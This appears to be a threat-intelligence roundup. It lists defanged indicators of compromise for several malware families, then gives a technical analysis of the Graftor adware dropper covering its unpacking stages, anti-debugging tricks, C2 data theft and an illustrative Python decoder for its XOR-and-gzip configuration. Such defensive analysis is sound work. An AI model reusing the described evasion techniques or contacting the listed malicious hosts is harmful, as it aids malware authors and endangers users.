File Hashes
  • 56ef4bb6608968653af98649fddf204933134038b6b27b118ebedcdc5ec5af0e
  • 946def9e50a762ef29de5b56086d976f26446f0bcb5f2590c0354eae1318e0fb
  • 220128b685d4e96e793756636e32257b8fd22e038890d8f194d1681343bea923
  • a4ad5629d490b466e4e62bf9048968ff45466c73849609b64d6617bf32e5cc5f
  • d6ece69e9f8035de573411d57ea11e0bb22d243e0d47b620b9cb99793218b121
  • aecf2b9c77b76f08c6a240cd5b0782f3abba0a872caea783f5105b3b3f42851a

Coverage


Screenshots of Detection: AMP, ThreatGrid, Umbrella (images not reproduced)


Doc.Macro.Obfuscation-6336014-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
    • Value: PnpInstanceID
  • <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES
    • Value: 3488D8938CAA8400F802C2439F4B8FCDCE406396
  • <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\3488D8938CAA8400F802C2439F4B8FCDCE406396
Mutexes
  • socket.1
  • socket.0
  • tty_list::mutex.0
  • socket.2
  • Global\刐ƶ
IP Addresses
  • 82[.]195[.]75[.]101
  • 91[.]219[.]237[.]229
  • 109[.]163[.]234[.]8
  • 38[.]229[.]72[.]16
  • 23[.]21[.]138[.]252
  • 31[.]185[.]104[.]20
  • 78[.]47[.]38[.]226
  • 104[.]20[.]73[.]28
  • 184[.]73[.]220[.]206
  • 46[.]28[.]110[.]244
  • 81[.]7[.]16[.]182
  • 198[.]199[.]64[.]217
  • 174[.]129[.]241[.]106
  • 50[.]19[.]238[.]1
  • 154[.]35[.]132[.]70
  • 62[.]210[.]92[.]11
  • 72[.]21[.]81[.]200
  • 151[.]80[.]42[.]103
  • 5[.]39[.]92[.]199
  • 86[.]59[.]21[.]38
  • 192[.]30[.]255[.]120
  • 192[.]30[.]255[.]121
  • 185[.]100[.]86[.]128
  • 144[.]76[.]163[.]93
  • 178[.]62[.]22[.]36
  • 104[.]20[.]74[.]28
  • 51[.]254[.]101[.]242
  • 46[.]252[.]26[.]2
  • 89[.]45[.]235[.]21
  • 192[.]168[.]1[.]1
  • 178[.]62[.]86[.]96
  • 178[.]62[.]197[.]82
  • 52[.]173[.]193[.]166
  • 192[.]168[.]1[.]255
  • 120[.]29[.]217[.]46
  • 138[.]201[.]14[.]197
  • 86[.]59[.]119[.]88
  • 192[.]30[.]255[.]113
  • 192[.]30[.]255[.]112
  • 85[.]25[.]116[.]81
  • 107[.]22[.]255[.]198
  • 23[.]23[.]170[.]235
  • 192[.]168[.]1[.]127
Domain Names
  • fv-st-konrad[.]de
  • www[.]fv-st-konrad[.]de
  • api[.]ipify[.]org
  • api[.]nuget[.]org
  • chocolatey[.]org
  • dist[.]torproject[.]org
Files and or directories created
  • %AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\cert8.db
  • %TEMP%\ts\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll
  • %TEMP%\ts\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll
  • %AppData%\MS\s\SECURITY
  • %AppData%\MS\s\EXAMPLES
  • %AppData%\MS\s\socat.exe
  • %TEMP%\ts\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
  • %System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
  • %AppData%\MS\Tor\tor.exe
  • %AppData%\tor\cached-microdescs.new
  • %AppData%\tor\lock
  • %TEMP%\ts\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
  • %TEMP%\ts\_rels\.rels
  • %AppData%\MS\Tor\libgcc_s_sjlj-1.dll
  • \TEMP\~$L Information.doc
  • %TEMP%\ts\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll
  • %System32%\Tasks\MRT
  • %System32%\Tasks\SC
  • %TEMP%\ts\lib\net40\JetBrains.Annotations.xml
  • %AppData%\MS\Tor\libevent_core-2-0-5.dll
  • %TEMP%\ts\lib\net40\JetBrains.Annotations.dll
  • %AppData%\MS\s\cygreadline7.dll
  • %TEMP%\ts\lib\net20\JetBrains.Annotations.xml
  • %AppData%\MS\Data\Tor\geoip6
  • %AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\prefs.js
  • %TEMP%\ts\lib\net20\Microsoft.Win32.TaskScheduler.XML
  • %TEMP%\ts\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
  • %TEMP%\ts\lib\net20\JetBrains.Annotations.dll
  • %WinDir%\AppCompat\Programs\RecentFileCache.bcf
  • %AppData%\MS\Tor\zlib1.dll
  • \Users\Administrator\Documents\20170822\PowerShell_transcript.PC.SLCVvGfn.20170822125043.txt
  • %AppData%\tor\cached-microdesc-consensus
  • %TEMP%\ts\lib\net40\Microsoft.Win32.TaskScheduler.XML
  • %TEMP%\ts\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll
  • %TEMP%\ts\lib\net20\Microsoft.Win32.TaskScheduler.dll
  • %AppData%\MS\Tor\libevent-2-0-5.dll
  • %AppData%\MS\Tor\tor-gencert.exe
  • \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16FC3937-61E8-4A38-8962-5CC96E748100}.tmp
  • %AppData%\MS\s\cygssl-1.0.0.dll
  • %TEMP%\ts\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll
  • \Users\Administrator\AppData\Local\Microsoft\Windows\WER\ReportQueue\AppCrash_mshta.exe_b620274e31657385a0786969c6cab647bc5a5eb0_48824423\Report.wer
  • %TEMP%\ts\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll
  • %AppData%\MS\s\cygwrap-0.dll
  • %TEMP%\ts\lib\net452\Microsoft.Win32.TaskScheduler.dll
  • %AppData%\MS\s\cygncursesw-10.dll
  • %AppData%\MS\s\VERSION
  • %AppData%\MS\Data\Tor\geoip
  • %AppData%\MS\s\README
  • %TEMP%\ts\lib\net35\JetBrains.Annotations.dll
  • %TEMP%\ts\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll
  • %TEMP%\ts\lib\net35\JetBrains.Annotations.xml
  • %TEMP%\ts\[Content_Types].xml
  • \Users\Administrator\Documents\20170822\PowerShell_transcript.PC.tnwsG1BN.20170822125100.txt
  • %TEMP%\ts\lib\net40\Microsoft.Win32.TaskScheduler.dll
  • %AppData%\MS\s\cygcrypto-1.0.0.dll
  • %AppData%\MS\Tor\libssp-0.dll
  • %TEMP%\ts\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll
  • \TEMP\DHL Information.doc
  • %TEMP%\ts\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll
  • %AppData%\MS\Tor\libevent_extra-2-0-5.dll
  • %TEMP%\ts\lib\net452\Microsoft.Win32.TaskScheduler.XML
  • %AppData%\tor\cached-certs
  • \Users\Administrator\Documents\20170822\PowerShell_transcript.PC.PBM+k85t.20170822125056.txt
  • %TEMP%\ts\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll
  • %System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.0.regtrans-ms
  • %AppData%\MS\s\BUGREPORTS
  • %TEMP%\ts\package\services\metadata\core-properties\b413d53c92364baa9958fdda02cd8e9a.psmdcp
  • %TEMP%\ts\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll
  • %AppData%\MS\Tor\libeay32.dll
  • %TEMP%\ts\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll
  • %AppData%\MS\Tor\ssleay32.dll
  • %TEMP%\ts\lib\net452\JetBrains.Annotations.dll
  • %TEMP%\ts\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll
  • \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40DVD2HR\api_ipify_org[1].txt
  • %TEMP%\ts\lib\net35\Microsoft.Win32.TaskScheduler.dll
  • %TEMP%\ts\lib\net452\JetBrains.Annotations.xml
  • %AppData%\MS\s\FAQ
  • %TEMP%\ts\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll
  • \Users\Administrator\Documents\20170822\PowerShell_transcript.PC.MiXmZ0jf.20170822125034.txt
  • %System32%\Tasks\SUT
  • %AppData%\tor\state
  • %TEMP%\ts\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
  • %TEMP%\7238.exe
  • %TEMP%\CVRD4FC.tmp.cvr
  • %AppData%\MS\s\CHANGES
  • %TEMP%\ts\TaskScheduler.nuspec
  • %TEMP%\ts\lib\net35\Microsoft.Win32.TaskScheduler.XML
  • %AppData%\MS\s\README.md
  • %AppData%\Microsoft\Office\Recent\DHL Information.LNK
File Hashes
  • bce01bde972b5d97e6bc163cd632fa7c2a1e9f1913abe69f8eb25d22a06063c8
  • 029923c7508a27907e2c88baf9cc2effa2f78e81f4728eae2c185935f2a51fbd
  • 07b63a132b60b293532787b50c7765c6af9cebcc0449592ad31dec1198fc8b5a
  • 12c9ae29a83bf6ecf5766d9f51a2927d586bed20c3d37e4e150ffecadf8cd010
  • 2d1cbae9da80482fffdbbcc4f761e5b12ffbfeb2446026862d381ac80fa0f335
  • 4c5c70e7c517e35f93fd65aa493a9bbad63561ad7dc8b5235e23ca843c9c274e
  • 5d683f41aa10da94c4737aa8901fc92b93d4f5484f4728bcbd802b9336275d59
  • 8b3c33104719d76829977a595901992bb7183ded8f5d1ef379281c7c158ef803
  • 900df27eff06c022c5fc9f6ebdb6f5f1a1e9d65c2de1d5f6300c899937bb95e7
  • 9ef470811ceaab0d47bb4b8e0abdf7d783902c208fedda35f8292b60af7f6870
  • d3bc718d0cb24a9ffb25ae75d413f29fdb173e9174fd07d06ee8bb49ebec2330
  • e433044ade8b09c97cd4b2008bccb9f12d45e32f84a94efbc800754c58ed3eb2
  • efe8092be61ec8c11d6152fbf569517299f3a17322a14d5e1c13350ceaeac223
  • ff428dd61e1f50b36e6fc6707054840c0912455bea073edc5806467ca8cb7046
  • 0009657099e7e3f555a68ae39827099905339f5dafe648585175de089a75ba6b
  • 3724ecf98a0a71f54c227e00417bf0ea603ca480ac6db2a2708cc275f6227104
  • 44cd48611f0044d98082ba3dd816b61fe80ee91812fc05ee1f3f37690f51bacc
  • 488f6347913c580600ca24527ab8a0f3d2129c597a6398cc857eec4f1b0348c1
  • 4b9f88762b2eb226b86c5bb4ce04b4ffcd07d0e332bbc92ed6dd2d7d451c8269
  • 57c8d5b413e5ddc4bbf416ef8ac9b902eb1058e18b79e76ef5340c835c9cfa73
  • 6fe1e272df58349481d71357488f08fda7bf4709cd72be00ce5e42c244783649
  • 6fef1c02e5d06c9cd2b29fee73e796791b7b84a1875ff19296140d49823621ae
  • 6ff2121b359d8a2776c25293aa96b823759b0796e559e70bc6d2e8adaf208fd7
  • 8b0d3d287580a5095e92aaf357bb39e1ab754dd3eaa4ca9c2f7ee4727f5649dd
  • 8e03b31baaa847ffef1df04336d7629bd8c8ca169406768479114b91b96c9092

Coverage


Screenshots of Detection: AMP, ThreatGrid (images not reproduced)


Doc.Trojan.Agent-6336128-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses
  • 216[.]138[.]226[.]110
  • 64[.]182[.]208[.]181
  • 5[.]152[.]210[.]176
Domain Names
  • keybeautysystemswest[.]com
  • icanhazip[.]com
Files and or directories created
  • %AppData%\winapp\Nkahvx.exe
  • %AppData%\winapp\client_id
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\Olaiwy.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\lubuj.bat
  • %AppData%\winapp\group_tag
  • %WinDir%\Tasks\services update.job
File Hashes
  • 9557c5337e1ebcc8dfe36e284be35c32ce22d2a4fbac56602d326598594899a8
  • b20fac264fb5724f17caafc34df08fc57879c0b30d360352a8e2b1ae3f9c2022
  • e77b85c8d93c7d1093eeea80621ad45ab3f091d537837a425b4e8829a2041aa4
  • fef300c8fad4477c75fd83aaa5a0033ee79c46e948148b4a7ed372943c306f5d

Coverage


Screenshots of Detection: AMP, Umbrella, and a screenshot of the lure document (images not reproduced)


Vbs.Trojan.VBSTrojan-6336102-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value: AutoDetect
  • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness
Mutexes
  • N/A
IP Addresses
  • 138[.]128[.]191[.]146
Domain Names
  • www[.]flemingz[.]com
  • flemingz[.]com
Files and or directories created
  • %TEMP%\ReAIquyDcG.exe
  • %TEMP%\ReAIquyDcG.exeA
File Hashes
  • 940723f511b9ecaf14478330baa01d4384f168de4b9c25a42e2865fde11067e4
  • 5bf717cf8794bc159f95b59fb73e46d8e46fcca03d5dca9b47d0b398fb9db17a
  • a9832474a614d15382a50954c3adf5ab7774698dcf57417c80f2abc640399639

Coverage


Screenshots of Detection: AMP, ThreatGrid, Umbrella (images not reproduced)


Win.Malware.Dinwod-6336124-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • N/A
Files and or directories created
  • %SystemDrive%\jr8g6w6.exe
  • %SystemDrive%\3t9bd.exe
  • %SystemDrive%\dvdvv.exe
  • %SystemDrive%\69w460.exe
  • C:\Windows\friendl.dll
File Hashes
  • 002eb4fddf6e8f9165e28694da6f368626282bd7e99c11f1eaeb365339c2331a
  • 01b538e451a390f7cfcdc263355dca070ea1a578d083fa94762912cff36b226b
  • 026a7284b6420e06f20e683054e0ed01a0afa14321fe4094c14bdb63a46ee17f
  • 04d8c0fd0f85b534c8a225be38e7bda9dc7edc248b1f6419fb64a99fde5b4b11
  • 050e9daae7c0778e00b17a71d70f34a9ec60c7ac1d309d53ffd23e7a74f81b2e
  • 06ebf78a7f2f3cbc7a8961051f3bfe9211b8dc8fd255be6f9df7b96f261a46ad
  • 07509506034c49b52314ee53984af6556396da7070c9d0069324f555f722db6d
  • 076e08eb3eae357b4ee75f9bc1e9fe8a9ea3b3e3ddafe244e0583e320a0bfd26
  • 07ab8a56baed7f7014781b275e8324e8bb7974360ac05d017c65d40ed05e1869
  • 07b5361cde1a670a587bd7d58160c97282415a025b4b9d1efa806a121e577027

Coverage


Screenshots of Detection: AMP, ThreatGrid (images not reproduced)


Win.Trojan.AlmanCloud-6336008


Indicators of Compromise


Registry Keys
  • <HKU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
  • <HKU>\SessionInformation
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
    • Value: Collection
  • <HKU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  • <HKLM>\SYSTEM\ControlSet001\Services\Eventlog\Application
  • <HKU>\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • <HKU>\SessionInformation
  • <HKLM>\SYSTEM\ControlSet001\Enum\Root\LEGACY_RASMAN\0000\Control
  • <HKLM>\SYSTEM\ControlSet001\Services\Eventlog\Application\Microsoft H.323 Telephony Service Provider
  • <HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
  • <HKLM>\SYSTEM\ControlSet001\Enum\Root\LEGACY_TAPISRV\0000\Control
Mutexes
  • \BaseNamedObjects\Global\RAS_MO_01
  • Local\MSCTF.Asm.MutexDefault1
  • \BaseNamedObjects\RAS_MO_02
IP Addresses
  • 148[.]81[.]111[.]121
Domain Names
  • klcwba[.]com
  • ajiyoh[.]com
  • dpwrjl[.]com
  • uatcte[.]com
  • imtxxh[.]com
  • lobsyb[.]com
  • xcckyn[.]com
  • uvebwz[.]com
  • iazfmh[.]com
  • zisbon[.]com
  • wyspqd[.]com
  • oeuuvh[.]com
  • udvjli[.]com
  • abvjlx[.]com
  • aoogeq[.]com
  • ilo[.]brenz[.]pl
  • lxoalw[.]com
  • wvnyqa[.]com
  • gnapgq[.]com
  • cxniir[.]com
  • gzoiji[.]com
  • rrbuas[.]com
  • tdsuye[.]com
  • kfgsia[.]com
  • vdbqhy[.]com
  • ygmyqt[.]com
  • upeuoz[.]com
  • eqyaud[.]com
  • wouaoc[.]com
  • omkbel[.]com
  • ioiufb[.]com
  • eyakmj[.]com
  • ukjqcx[.]com
  • twngee[.]com
  • bkegyi[.]com
  • dgyolj[.]com
  • ycztdl[.]com
  • dtptuw[.]com
  • aqqvuo[.]com
  • ioafts[.]com
  • caqiny[.]com
  • zqkqzt[.]com
  • dezims[.]com
  • ukngdn[.]com
  • ousvfo[.]com
  • bdgxqr[.]com
  • axqeuo[.]com
  • bidnxy[.]com
  • heuaot[.]com
  • gqugaq[.]com
  • aikuul[.]com
  • eiijba[.]com
  • qsjite[.]com
  • btaeqx[.]com
  • teioez[.]com
  • obwijg[.]com
Files and or directories created
  • %System32%\wbem\Logs\wbemess.log
  • \Users\Administrator\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
  • \Users\Administrator\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{684B4A19-F6D3-453D-B879-0BEB15FECE08}.FSD
  • %System32%\drivers\etc\hosts
  • \Users\Administrator\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
  • \ntsvcs
  • %WinDir%\Prefetch\273142363.EXE-3748BAA7.pf
  • \lsass
File Hashes
  • a0fc82de8afd8ac9d2a9df4c5f94ea0d44abdad70af70624f168c3c34036d35b
  • 5e0fcf513867bb834af4ebb405a328d66838e528e32e420a89eab7b8619f1830
  • 64091a671d00602e4f81f987207ac2b16f5c3e86f98add903bf369b528db2d38
  • 9727223d176381c88f6f5f17a2e7f99981eaba31282a41c1ceb3158bccbe08f4
  • f095ae655db18fb27667ece1c168b97d42b1b164991cda154022d6f8e270cd49

Coverage


Screenshots of Detection: AMP, ThreatGrid, Umbrella (images not reproduced)


Win.Trojan.Cuegoe-6336130-0


Indicators of Compromise


Registry Keys
  • HKU\Software\Microsoft\Office\12.0\Word
  • HKU\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • N/A
Files and or directories created
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\D.tmp
  • %SystemDrive%\~$runme.docx
  • %SystemDrive%\runme.exe
  • %AppData%\Microsoft\Templates\~$Normal.dotm
  • %SystemDrive%\runme.docx (copy)
File Hashes
  • 73c4f4e0dbe8bb08fa68c7aa73e44651a322d5a04e462e546d6cf0c9e4897235
  • 6d20ac8668c1876117cfb7686d1dd71a82a88bc69595a9d698591a5ea41878b6
  • c8810c54be65f65747458e905afaaf534202d2c6bd5dc681309a1872042946b3
  • f3b527e625e6f198b5d44150bd4b5408935e57b7f7b395deba33f1662e2a2737
  • c95ad921fa61c90a84ce29748ee334827fab456bb5807ad2f3e5c688bc539903
  • 5f312c0ec89ad31cb819663059c97505cc72032f429cff33c61995ca651d52c0
  • afc27b6c6deace69313e1e164257ca0b5e5ce003c34c79ca1dc43dd67129f081
  • 55a8224f9b571776935e0340c9093b35b90b9138ef87e8484429b27c9ea61681
  • 9edbd6e5cf7cfa8f6c5ca9a80a487e420996cae0982fbcbfe72206c0b85845db
  • e0d385356bc5dc0a7619553d391259b8acd0f226dafb719b505bec4cba58fb46

Coverage


Screenshots of Detection: AMP, ThreatGrid (images not reproduced)

Graftor - But I Never Asked for This…

This post is authored by Holger Unterbrink and Matthew Molyett

Overview

Free software downloaded from large freeware distribution sites is a boon for the internet, providing users with functionality they would otherwise not be able to use. Often users, happy that they are getting something for free, fail to notice the hints in the licence agreement that they are also receiving additional software bundled with the freeware they wanted.
Graftor, also known as the LoadMoney adware dropper, is a potentially unwanted program often installed as part of freeware installers. We wanted to investigate the effects this software has on a user's system. According to the analysis performed in our sandbox, Graftor and the affiliate files it downloads perform the following functions:

  • Hijacks the user's browser and injects advertising banners
  • Installs other potentially unwanted applications from partners like mail.ru
  • It does not ask the user, it just silently installs these programs
  • Random web page text is turned into links
  • Adds Desktop and Browser Quick Launch links
  • User’s homepage is changed
  • User’s search provider is changed
  • Partner adware is executed and it social engineers the user to install further software
  • Checks for installed AV software
  • Checks for sandbox environments
  • Anti-Analysis protection
  • Unnecessary API calls to overflow sandbox environments
  • Creates/Modifies system certificates

Functionality


One of the first actions of the software is to install additional software on the user’s desktop, and change browser settings to point to third party websites (Fig.1):
Fig. 1
Looking at the Cisco Umbrella DNS data for the CnC domain used in this campaign, we can see that the campaign only lasted for a couple of days (Fig. 2a), but affected a significant number of people. Fig. 2b and 2c show domains of two of the affiliate applications which Graftor installed during our sandbox run. It is very likely that this includes users who didn’t intend to install these additional applications.

Regularfood[.]gdn (Command and Control Server Domain)
Fig. 2a
Affiliates (programs installed by Graftor):
Fig. 2b
Fig. 2c

Technical Details

A few minutes after executing the original Graftor dropper (2263387661.exe), the software downloaded and installed a series of additional executables. This results in the process tree looking like this (Fig.3): 
Fig. 3
We analysed the Graftor dropper/downloader (2263387661.exe). It comes with multiple stages of obfuscation. The first unpacking stage uses a heavily obfuscated but fairly simple unpacking algorithm, which we describe in the following section.

This algorithm is obfuscated within the WinMain function and distributed over several sub-functions. Fig. 4 shows the complexity of WinMain in IDA: many of these basic blocks are combined with further sub-functions, jumping back and forth, which makes analysis particularly challenging.
Fig. 4

First, a new buffer is allocated (see Fig.5 at 00401395) :
Fig. 5
Then the bytes at 00416B6A (see Fig. 9 below) are decoded by different sub-functions within WinMain; see for example loc_4013EC in Fig. 6.
The code avoids calling functions by address; instead it calls them through values held in registers or variables. For example, the call ebx instruction at 00401395 in Fig. 5 resolves to VirtualAlloc at runtime. This makes static analysis harder: without deeper analysis it is difficult to identify the destination of the call at 00401395 shown in Fig. 5.
Fig. 6
Finally the decoded bytes are handed over to a function (Fig. 7 write_unpkd_bytes2buf), which writes these bytes into a buffer. This is the buffer which was allocated in Fig.5 at 00401395. The decoding loop starts again until all bytes are decoded:
Fig. 7
Fig. 8 shows the write_unpkd_bytes2buf function itself:
Fig. 8
The end result is that despite all of the complexity and obfuscation, the unpacking algorithm is remarkably simple and translates to the following pseudo-code (see Fig. 9 comments):
Fig. 9
This first stage of unpacking extracts the code into memory. After successfully unpacking this code it is executed via call ecx (see Fig. 10) - the second stage of the unpacker:
Fig. 10
This second stage code is position independent. It is loaded at an address chosen by the operating system: the VirtualAlloc call in Fig. 5 mentioned above is made with LPVOID lpAddress set to NULL, which means the system determines where to allocate the memory region. This second stage is even more obfuscated by spaghetti code than the first. Its main task is to rebuild the Import Address Table (IAT) and resolve the addresses of certain library functions (Fig. 11), and to modify the original PE file.
Fig. 11
It stores the function addresses in different local variables. These are passed as arguments to several setup functions, for example: change memory region 0x400000 - 0x59C000 to read/write/execute (see Fig. 12). In other words, change the whole .text, .rdata, .data, and .rsrc section of the original PE file to read/write/execute. This enables the dropper to modify and execute the code stored in these regions. As we have already seen, in order to frustrate static analysis, most calls are obfuscated by either calling registers or variables (Fig.12).
Fig. 12
The next step, at 002A14F6, is to allocate a buffer located at 01DC0000:
Fig. 13
This buffer is filled with the bytes copied from 0042d049 from the original packed PE file:
Fig. 14
Fig. 15
This data is an encoded PE file. After copying the bytes to memory, it decodes them and writes them back to the buffer (Fig. 16a) at 01DC0000 (Fig. 16b)
Fig. 16a

Fig. 16b
This stage is protected with an anti-debugging technique. The executable makes two GetTickCount calls and measures the time elapsed between them (Fig. 17a and 17b). If it takes too long, as it would when single-stepping through the code in a debugger, the executable crashes.
Fig. 17a
Fig. 17b
After resolving more library function addresses and fixing the IAT of the PE file in memory, it sleeps for 258 milliseconds and jumps back to 004897D3, which we will call the third stage from now on.
Fig. 18

The 2nd unpacking stage, the one we have just discussed, also decodes the URL which is later used to contact the command and control server. First it allocates a buffer e.g. at 002B0000 (Fig. 19a) and reads the encrypted URL from the original sample at 004020c0, decodes it and stores it in the allocated buffer i.e. 002B0000 again (Fig. 19b).

Fig.19a
Fig. 19b
The third stage (see above) is a C++ executable compiled with Visual Studio. Global object initializers allow custom classes to run during the C runtime initialization, before the apparent WinMain entry point. Organizing code in this way allows the malware to prepare the system survey in a way that is hidden from analysts who commence their analysis from WinMain. Later, when the associated code is used, the execution is masked by memory redirection and virtual function calls.
Below you can see the callback function addresses stored in the .rdata segment of the PE file (Fig.20) and its initialization function InitCallbacks (Fig.21 and Fig. 23).
Fig. 20
Fig. 21
From the pre-WinMain C Run Time library (CRT) initialization, the callback function list gets created and populated with an association between named strings (e.g. "OS"), later observed in the CnC traffic, and several system information collection callback functions. For example, a "systemFS" string in the CnC traffic leads to a call to the Graftor_CollectSystemVolumeInformation function, and "OS" triggers the call of Graftor_CollectWindowsInformation.
Fig. 22 shows an example of such function calls and pseudo code which would lead to a similar assembler code as discussed.
Fig. 22

The created list is linked to a global address location, which is later linked back again to local variables.
Fig. 23

Such redirection is subtle in source code, but the resulting execution means that chains of memory accesses are seen instead of just nice clean references to the object.
Fig. 24

Later on, a string is passed along to look up the callback and call it indirectly (Fig.25).
Fig. 25


By using std::basic_string<wchar_t> instead of plain wchar_t arrays, every string interaction adds two function calls and a level of indirection. Instead of the analyst seeing a wide string being pushed to one function, it is instead a series of three. Before significant markup is performed (or when viewed in a debugger) this is just a mess of function calls and memory manipulation. Complicating the matter is that the std library is statically linked rather than dynamically linked, so the analyst doesn't get DLL calls as hints.
Further on, this 3rd stage is protected by another anti-debugging technique: the sample registers a VectoredExceptionHandler for FirstChanceExceptions (C0000005) as you can see in Fig. 26 and 27:

Fig. 26
Fig. 27

Then it marks the code section as PAGE_NOACCESS.
Fig. 28a
Fig. 28b

This means an exception is triggered for every single instruction in this section. The exception handler function (see Fig. 27 above) overwrites the PAGE_NOACCESS protection of the memory page which caused the exception with PAGE_EXECUTE_READWRITE, so it can be executed. The exception handler then returns to the faulting instruction, which can now be executed, but the next instruction is still protected by PAGE_NOACCESS and will cause the next exception. With a debugger attached, this interrupts the debugging session for every instruction. Even if the exceptions are passed straight back to the executable, it massively slows down the execution speed.
At 004BB3FA the software starts preparing the internet request to the CnC server and encrypts the collected information to perform a GET request (Fig. 29a-c):

Fig. 29a
Fig. 29b
Fig. 29c
Talos has decrypted the GET request that is sent to the CnC server. The decoded content consists of a JSON file, which you can download here.

The executable is capable of sending the following information to the C2 server:

MAC, SID, HD serial number, username, GUID, hostname, HD size, HD devicename, Filesystem, OS version, browser version, DotNET version, Video Driver, Language Settings, Memory, system bios version, domainname, computername, several processor related parameters, number of processors, other installed adware and unwanted programs, running processes, keyboard settings, Antispyware, Firewall, Antivirus and more.

The server responds to this with an encrypted configuration file which is processed here:
Fig. 30
The same decryption algorithm which is used for the GET request is also used to decrypt the CnC server's response. It generates a fairly simple stream seeded by the first byte of the packet and XORs it with the data. Underneath the encryption is a simple gzip stream.
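As an added illustration of that layering (this is not Graftor's code, and the post does not publish the real stream generator): the keystream function below is a labelled placeholder LCG, so the example shows how an analyst structures the decode and validates a candidate generator by the gzip magic bytes, not the actual cipher. The sample configuration and its URL are constructed.

```python
import gzip
import json


def placeholder_keystream(seed: int, length: int) -> bytes:
    """Stand-in keystream generator (a hypothetical LCG), NOT Graftor's real one.

    The post only states that the stream is simple and seeded by the packet's
    first byte; this placeholder lets the decode layering be demonstrated.
    """
    state = seed
    out = bytearray()
    for _ in range(length):
        state = (state * 1103515245 + 12345) & 0xFFFFFFFF
        out.append((state >> 16) & 0xFF)
    return bytes(out)


def xor_bytes(data: bytes, stream: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, stream))


def encode_response(plaintext: bytes, seed: int, keystream=placeholder_keystream) -> bytes:
    """Build a packet in the described layout: seed byte || XOR(keystream, gzip(plaintext))."""
    compressed = gzip.compress(plaintext, mtime=0)
    return bytes([seed]) + xor_bytes(compressed, keystream(seed, len(compressed)))


def strip_xor_layer(packet: bytes, keystream=placeholder_keystream) -> bytes:
    """Peel the XOR layer: the first byte seeds the stream, the rest is ciphertext."""
    if not packet:
        raise ValueError("empty packet")
    seed, body = packet[0], packet[1:]
    return xor_bytes(body, keystream(seed, len(body)))


def is_gzip(data: bytes) -> bool:
    """The gzip magic (1f 8b) is the cheap check that a keystream candidate is right."""
    return data[:2] == b"\x1f\x8b"


def decode_response(packet: bytes, keystream=placeholder_keystream) -> bytes:
    """Full decode: remove the XOR layer, check the gzip magic, then inflate."""
    inner = strip_xor_layer(packet, keystream)
    if not is_gzip(inner):
        raise ValueError("keystream candidate did not produce a gzip stream")
    return gzip.decompress(inner)


def keystream_candidate_works(packet: bytes, keystream) -> bool:
    """Analyst helper: does this candidate generator turn the packet into gzip data?"""
    try:
        return is_gzip(strip_xor_layer(packet, keystream))
    except ValueError:
        return False


# Constructed sample config in the shape the post describes ('l' = download URL
# list, 'a' = command line); the URL is a placeholder, not a real indicator.
SAMPLE_CONFIG = json.dumps(
    {"l": ["hxxp://partner.example.invalid/installer.exe"], "a": "/silent"}
).encode()


if __name__ == "__main__":
    packet = encode_response(SAMPLE_CONFIG, seed=0x5A)
    print(json.loads(decode_response(packet)))
```

Swapping in a candidate generator recovered from the binary and checking `keystream_candidate_works` on a captured packet is the quickest way to confirm the candidate before inflating.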
